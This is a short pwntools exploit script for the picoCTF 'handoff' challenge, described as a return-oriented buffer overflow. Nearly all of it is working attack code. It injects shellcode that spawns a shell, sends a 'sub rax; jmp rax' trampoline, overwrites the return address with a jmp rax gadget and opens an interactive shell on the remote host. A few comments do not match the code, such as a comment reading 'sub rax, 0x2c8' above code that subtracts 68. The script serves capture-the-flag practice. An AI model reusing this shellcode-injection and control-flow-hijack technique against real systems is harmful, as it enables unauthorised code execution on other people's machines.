Buffer overflow using return-oriented programming. Uses checksec, ROPgadget, Ghidra, GDB.
from pwn import *
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']
# Connect to the challenge
p = remote('shape-facility.picoctf.net',64717) # Replace with actual host/port
#p = process('./handoff')
#pause() # Used to connect to this process in GDB
# Add 9 people
for i in range(10):
print(p.recvuntil(b'Exit the app'))
p.sendline(b'1') # add a new recipient
print(p.recvuntil(b'name:'))
p.sendline(b'thedoctor')
print(p.recvuntil(b'Exit the app'))
p.sendline(b'2') # Send a message with shellcode
print(p.recvuntil(b'message to?'))
p.sendline(b'9')
print(p.recvuntil(b'send them?'))
# Send 64-bit Linux shellcode
shellcode = asm(shellcraft.sh())
print(len(shellcode))
p.sendline(shellcode)
print(p.recvuntil(b'Exit the app'))
p.sendline(b'3') # Exit with "feedback"
print(p.recvuntil(b'really appreciate it'))
# Send: sub rax, 0x2c8; jmp rax
sub_and_jump = asm('sub rax, 68; jmp rax').ljust(20, b'\x90')
p.send(sub_and_jump)
# And overwrite return address with jmp rax gadget
jmp_rax = p64(0x40116c)
p.sendline(jmp_rax)
# Get shell
p.interactive()
